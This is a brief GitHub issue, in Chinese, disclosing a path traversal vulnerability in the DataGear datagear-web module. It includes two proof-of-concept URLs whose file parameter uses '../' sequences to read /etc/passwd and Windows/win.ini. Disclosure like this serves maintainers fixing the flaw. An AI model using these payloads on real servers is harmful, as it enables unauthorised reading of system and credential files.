Firebasky opened this issue 3 years ago · 2 comments
亲爱的朋友,该项目存在一个安全漏洞。
poc: url/driverEntity/downloadDriverFile?id=1?file=../../.../../../../../../../etc/passwd
漏洞存在是在datagear-web模块中
poc:
/driverEntity/downloadDriverFile?id=1&file=../../.../../../../../../../../../Windows/win.ini